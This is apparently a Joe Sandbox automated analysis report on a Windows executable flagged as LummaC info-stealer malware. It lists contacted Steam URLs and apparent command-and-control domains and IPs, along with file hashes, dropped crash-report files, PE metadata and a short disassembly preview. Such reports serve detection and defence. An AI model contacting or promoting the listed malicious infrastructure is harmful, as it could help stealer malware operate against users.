                          https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&amp;l=efile.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                          https://steamcommunity.com/workshop/file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                          https://store.steampowered.com/legal/file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1359433873.0000000000C97000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=efile.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/shared/css/shared_respfile.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                          https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvfile.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=englfile.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://upx.sf.netAmcache.hve.5.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://store.steampowered.com/file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvwfile.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://studennotediw.store:443/apifile.exe, 00000000.00000002.1565088782.0000000000BFE000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                          https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.giffile.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/css/skin_1/profilevCfile.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            https://steamcommunity.com/K)file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://steamcommunity.com/linfile.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                https://spirittunek.store:443/apifile.exe, 00000000.00000002.1565088782.0000000000BFE000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=bz0kMfQAfile.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=englishfile.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vP05wfile.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtfile.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://store.steampowered.com/account/cookiepreferences/file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1359433873.0000000000C97000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://clearancek.site:443/apizfile.exe, 00000000.00000002.1565088782.0000000000BFE000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://store.steampowered.com/mobilefile.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://steamcommunity.com/file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&amp;l=englishfile.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&amp;l=englfile.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://steamcommunity.com/profiles/76561199724331900/badgesfile.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1565088782.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmptrue
                                            • URL Reputation: malware
                                            		unknown

                                            World Map of Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public IPs

                                            IPDomainCountryFlagASNASN NameMalicious
                                            104.102.49.254
                                            		steamcommunity.comUnited States
                                            		16625AKAMAI-ASUStrue
                                            172.67.206.204
                                            		sergei-esenin.comUnited States
                                            		13335CLOUDFLARENETUStrue

                                            General Information

                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1532571
                                            Start date and time:2024-10-13 17:45:09 +02:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 4m 42s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:12
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:file.exe
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winEXE@2/5@10/2
                                            EGA Information:Failed
                                            HCA Information:Failed
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe

                                            Warnings

                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                            • Excluded IPs from analysis (whitelisted): 20.189.173.21
                                            • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                            • Execution Graph export aborted for target file.exe, PID 7352 because there are no executed function
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            11:46:12API Interceptor4x Sleep call for process: file.exe modified
                                            13:32:32API Interceptor1x Sleep call for process: WerFault.exe modified

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            104.102.49.254http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                            • www.valvesoftware.com/legal.htm
                                            172.67.206.204file.exeGet hashmaliciousLummaCBrowse
                                              file.exeGet hashmaliciousLummaCBrowse
                                                Setup.exeGet hashmaliciousLummaCBrowse
                                                  Setup.exeGet hashmaliciousLummaCBrowse
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                      file.exeGet hashmaliciousLummaCBrowse
                                                        WxmEM5HgjY.exeGet hashmaliciousLummaCBrowse
                                                          file.exeGet hashmaliciousLummaCBrowse
                                                            Setup.exeGet hashmaliciousLummaCBrowse
                                                              file.exeGet hashmaliciousLummaCBrowse

                                                                Domains

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                sergei-esenin.comfile.exeGet hashmaliciousLummaCBrowse
                                                                • 104.21.53.8
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 172.67.206.204
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 172.67.206.204
                                                                Setup.exeGet hashmaliciousLummaCBrowse
                                                                • 172.67.206.204
                                                                Setup.exeGet hashmaliciousLummaCBrowse
                                                                • 172.67.206.204
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 104.21.53.8
                                                                Set-up.exeGet hashmaliciousLummaCBrowse
                                                                • 104.21.53.8
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 172.67.206.204
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 104.21.53.8
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 172.67.206.204
                                                                steamcommunity.comhttps://steamcommunlty-gifts.com/s/HRABGet hashmaliciousUnknownBrowse
                                                                • 104.102.49.254
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 104.102.49.254
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 104.102.49.254
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 104.102.49.254
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 104.102.49.254
                                                                Setup.exeGet hashmaliciousLummaCBrowse
                                                                • 104.102.49.254
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 104.102.49.254
                                                                Setup.exeGet hashmaliciousLummaCBrowse
                                                                • 104.102.49.254
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 104.102.49.254
                                                                Set-up.exeGet hashmaliciousLummaCBrowse
                                                                • 104.102.49.254

                                                                ASNs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                CLOUDFLARENETUShttps://business.helpcaseappealcenter.eu/community-standard/346299132520232Get hashmaliciousUnknownBrowse
                                                                • 188.114.96.3
                                                                https://currenntlyattyah06.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                                                • 104.18.10.213
                                                                https://businesssupport248.mfb72024.click/Get hashmaliciousUnknownBrowse
                                                                • 104.17.25.14
                                                                http://dmcaactionenforcement.vercel.app/1vWOyN7xZ2xSoDL=KwTQr2qM04lQpteT.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                • 104.26.4.15
                                                                http://bdvinformation.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                • 104.16.124.96
                                                                http://secureprotocol1.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                • 104.16.123.96
                                                                https://bantuan-customer-care-dana.officio.asia/Get hashmaliciousUnknownBrowse
                                                                • 172.67.207.178
                                                                https://steamcommunlty-gifts.com/s/HRABGet hashmaliciousUnknownBrowse
                                                                • 104.17.25.14
                                                                test.docGet hashmaliciousUnknownBrowse
                                                                • 104.20.4.235
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 104.21.53.8
                                                                AKAMAI-ASUShttps://steamcommunlty-gifts.com/s/HRABGet hashmaliciousUnknownBrowse
                                                                • 104.102.49.254
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 104.102.49.254
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 104.102.49.254
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 104.102.49.254
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 104.102.49.254
                                                                Setup.exeGet hashmaliciousLummaCBrowse
                                                                • 104.102.49.254
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 104.102.49.254
                                                                debug.dbg.elfGet hashmaliciousMirai, MoobotBrowse
                                                                • 23.53.183.89
                                                                Setup.exeGet hashmaliciousLummaCBrowse
                                                                • 104.102.49.254
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 104.102.49.254

                                                                JA3 Fingerprints

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                                                • 104.102.49.254
                                                                • 172.67.206.204
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 104.102.49.254
                                                                • 172.67.206.204
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 104.102.49.254
                                                                • 172.67.206.204
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 104.102.49.254
                                                                • 172.67.206.204
                                                                Setup.exeGet hashmaliciousLummaCBrowse
                                                                • 104.102.49.254
                                                                • 172.67.206.204
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 104.102.49.254
                                                                • 172.67.206.204
                                                                Setup.exeGet hashmaliciousLummaCBrowse
                                                                • 104.102.49.254
                                                                • 172.67.206.204
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 104.102.49.254
                                                                • 172.67.206.204
                                                                Set-up.exeGet hashmaliciousLummaCBrowse
                                                                • 104.102.49.254
                                                                • 172.67.206.204
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 104.102.49.254
                                                                • 172.67.206.204

                                                                Dropped Files

                                                                No context

                                                                Created / dropped Files

                                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_2f26e4b65edfc9809a16d7533fcfcfa7c28d99cc_852b229c_de226bca-5d07-408b-8189-7b2a945470e5\Report.wer

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):65536
                                                                Entropy (8bit):1.0176021884802195
                                                                Encrypted:false
                                                                SSDEEP:192:Prrx7uslJbvjPlktS0BU/YP3juFRp+zuiFE+Z24IO8TOB:T1a2jN6ZBU/gjhzuiFLY4IO8C
                                                                MD5:082808C53DE7A84D8AC9943AD5845910
                                                                SHA1:8DF4E6CBAD973CB0A9078958F561780470B16729
                                                                SHA-256:A64BAA98DBF3309DF38E0094BEF01A7784BDE13A63D01B55D3B4D7663D531A5A
                                                                SHA-512:5A50AD9BE2B35B512995385E7372839598370D06E415CFB58640746831CD069DDFF896026E0B349C79932A70000125D2A1BB7170857A1C079828D5175B8F760D
                                                                Malicious:true
                                                                Reputation:low
                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.3.0.7.9.7.6.2.2.9.0.0.8.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.3.3.0.7.9.7.6.8.3.8.3.8.4.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.e.2.2.6.b.c.a.-.5.d.0.7.-.4.0.8.b.-.8.1.8.9.-.7.b.2.a.9.4.5.4.7.0.e.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.d.1.c.f.b.8.0.-.c.5.a.9.-.4.c.6.6.-.a.0.4.b.-.5.f.d.9.7.b.1.b.2.6.8.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.b.8.-.0.0.0.1.-.0.0.1.4.-.a.a.d.7.-.1.3.0.6.8.7.1.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.e.4.9.2.d.7.6.8.e.7.9.7.3.1.6.2.4.b.c.d.f.2.e.7.6.1.5.f.9.1.8.0.0.0.0.f.f.f.f.!.0.0.0.0.1.5.6.4.f.8.7.b.3.d.a.3.3.b.6.1.1.d.c.b.9.2.d.d.5.f.f.7.3.6.2.2.2.0.a.f.4.7.4.a.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0.

                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER18E5.tmp.dmp

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                File Type:Mini DuMP crash report, 15 streams, Sun Oct 13 15:46:16 2024, 0x1205a4 type
                                                                Category:dropped
                                                                Size (bytes):280496
                                                                Entropy (8bit):1.487412388111131
                                                                Encrypted:false
                                                                SSDEEP:1536:aFKwo3aK5Jh8CMjTAKE2bhgxbKoJ9JLmeR:Wq3aK5Jh8CMjTAKE2lgNKQ99
                                                                MD5:6AD311B21E18C65A06A390BDC7C70D42
                                                                SHA1:5B2256E0A3289FC84A604AC971BA71E17800C139
                                                                SHA-256:3D7985102F66DFEB4C252E7F7049666439A89C52F545F1F52B442AF1B04CB03A
                                                                SHA-512:C5A54F9151DBDB2B1B570C8D9D2EBFE49FDA40B4479B882630BC737C452B1E33595423658809873C0BB474FD080B1031768EF52C184FE2BD7839C13650CE1DD2
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:MDMP..a..... .......H..g........................T...............,'..........>...........`.......8...........T............I...............'...........)..............................................................................eJ......d*......GenuineIntel............T...........A..g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER1A7C.tmp.WERInternalMetadata.xml

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):8298
                                                                Entropy (8bit):3.6912922956401646
                                                                Encrypted:false
                                                                SSDEEP:192:R6l7wVeJBCL6fJVO6YNySU9sOgmfBGe3pr/89b07sfZ8m:R6lXJ46fJVO6YYSU9sOgmfZa0Af3
                                                                MD5:736843012FD1962B22F758C52A57C36C
                                                                SHA1:A247475023F7DC5D46B63437C07C6E36040D293F
                                                                SHA-256:44B97C9C780DA53D4AAB14EF3A041FC1979CAF9A771F6E138D807A4745ABEACA
                                                                SHA-512:3289E3F65A6DD66E5ADDA4EA380595422DD4DD10A89160789B54856CC3EFFAFEC6A9313588E620E4DDA1DD40ED9FBD4160D980314516F670F96A23B61AB1D98C
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.5.2.<./.P.i.

                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER1ABC.tmp.xml

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):4542
                                                                Entropy (8bit):4.423408383310221
                                                                Encrypted:false
                                                                SSDEEP:48:cvIwWl8zsuJg77aI9EnWpW8VYe5Ym8M4JjlFg+q8CzxuMhgd:uIjfkI7aW7VqJ8jx9gd
                                                                MD5:D8080A148B8857B394B8561E43310FBE
                                                                SHA1:DC0DCED08A650BAB08C8DA85E939A2994D9972AF
                                                                SHA-256:ED7A4F16B3EE2F3F5CF15BD55D6B72E02275EAEBD6F9F0937F314DFE7E01E66E
                                                                SHA-512:251E402F2630EFF6077FD13256C4BD0425A70E3D6184BCBE6E06A70CE22E085A27295B2AB67809967DA7B5A66E7A8644331853CFC7CEC85C9A842DFCC4599B51
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="541848" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                C:\Windows\appcompat\Programs\Amcache.hve

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                Category:dropped
                                                                Size (bytes):1835008
                                                                Entropy (8bit):4.416541255023791
                                                                Encrypted:false
                                                                SSDEEP:6144:Wcifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuN85+:zi58oSWIZBk2MM6AFBqo
                                                                MD5:90AFCCEE1DEE020BA13D814E07AD7D8B
                                                                SHA1:AC6F1B36AFB22150FE7EC6B4F966E83132F7FD98
                                                                SHA-256:CEDD8F8424ACE511968BA41BE08398A374D0663AF6C8DBA5D2E124574ACA9ECD
                                                                SHA-512:DF79D433CE6F9712CF8FD6289571769910A2F99CB87A572BE5049670087145BA413A6AD8ECA6D33B8A6FDFFEF43309223338328D40931420B87D9DE3460CD6BF
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmB_..................................................................................................................................................................................................................................................................................................................................................c..=........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                Static File Info

                                                                General

                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Entropy (8bit):7.947845726882369
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:file.exe
                                                                File size:1'844'224 bytes
                                                                MD5:fb08a9067fae7bfd248416c863bd43d2
                                                                SHA1:1564f87b3da33b611dcb92dd5ff7362220af474a
                                                                SHA256:b649fde943868879f85d809bf5e84d9873b1c5ed308941e19cebb3ea6a230aff
                                                                SHA512:18d98d84e5df556e0adcf32cd0cdefece4a6266932f7198878b8478662131e855dd4980b002f82ed12d9423345143ba88778055b722767f985dadde67f77ecac
                                                                SSDEEP:49152:JfEALDRjDiP2QRjbTVg4txzU6PhCbnog:JfEwRjDinRjbTXvwyH
                                                                TLSH:5B8533BB342AA7B9C51C8571745BFBD449B5065A92E6C3403EC75BD8803A2D34F2EB83
                                                                File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...J..f..............................J...........@..........................0J.....z.....@.................................W...k..

                                                                File Icon

                                                                Icon Hash:00928e8e8686b000

                                                                Static PE Info

                                                                General

                                                                Entrypoint:0x8a0000
                                                                Entrypoint Section:.taggant
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x66FFF14A [Fri Oct 4 13:44:42 2024 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:6
                                                                OS Version Minor:0
                                                                File Version Major:6
                                                                File Version Minor:0
                                                                Subsystem Version Major:6
                                                                Subsystem Version Minor:0
                                                                Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                Entrypoint Preview

                                                                Instruction
                                                                jmp 00007F2CB51B0ADAh
                                                                lar ebx, word ptr [eax+eax]
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                jmp 00007F2CB51B2AD5h
                                                                add byte ptr [edx+ecx], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                adc byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add ecx, dword ptr [edx]
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                or byte ptr [eax+00000000h], al
                                                                add byte ptr [eax], al
                                                                adc byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add al, 0Ah
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                adc byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add al, 0Ah
